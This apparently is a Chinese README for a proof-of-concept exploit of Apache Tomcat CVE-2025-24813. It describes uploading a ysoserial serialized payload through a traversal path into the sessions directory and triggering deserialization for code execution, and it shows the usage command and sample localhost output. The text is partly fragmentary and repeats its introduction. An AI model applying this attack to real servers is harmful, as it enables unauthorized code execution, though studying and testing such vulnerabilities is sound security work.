
该仓库包含一个用于利用 **CVE-2025-24813** 的自动化概念验证(PoC)脚本,这是 Apache Tomcat 中的一个远程代码执行(RCE)漏洞。该漏洞允许攻击者向服务器上传恶意的序列化负载,在满足特定条件时通过反序列化实现任意代码执行。
针对 Apache Tomcat 中远程代码执行 (RCE) 漏洞 CVE-2025-24813 的概念验证 (PoC) 利用程序。该漏洞允许攻击者向服务器上传恶意的序列化负载,当满足特定条件时,可通过反序列化在服务器上执行任意代码。
CVE-2025-24813 是 Apache Tomcat 中一个理论上的 RCE 漏洞,其根源在于对上传的会话文件及反序列化机制的处理不当。攻击者通过向可写目录(例如 /uploads/../sessions/)上传精心构造的负载,即可触发反序列化,从而在目标服务器上执行任意命令。
要使该 PoC 成功利用漏洞,必须满足以下条件:
/index.jsp 发送 GET 请求)并触发负载的反序列化。ysoserial 生成负载或编译基于 Java 的负载。ysoserial 负载类型,则本地必须存在 ysoserial.jar 文件。python CVE-2025-24813.py <target_url> [options]
[+] Server is writable via PUT: http://localhost:8081/check.txt
[*] Session ID: absholi7ly
[+] Payload generated successfully: payload.ser
[+] Payload uploaded with status 409 (Conflict): http://localhost:8081/uploads/../sessions/absholi7ly.session
[+] Exploit succeeded! Server returned 500 after deserialization.
[+] Target http://localhost:8081 is vulnerable to CVE-2025-24813!
[+] Temporary file removed: payload.ser
[+] Server is writable via PUT: http://localhost:8081/check.txt
[*] Session ID: absholi7ly
[+] Payload generated successfully: payload.ser
[-] Payload upload failed: http://localhost:8081/uploads/../sessions/absholi7ly.session (HTTP 403)
[-] Target http://localhost:8081 does not appear vulnerable or exploit failed.
[+] Temporary file removed: payload.ser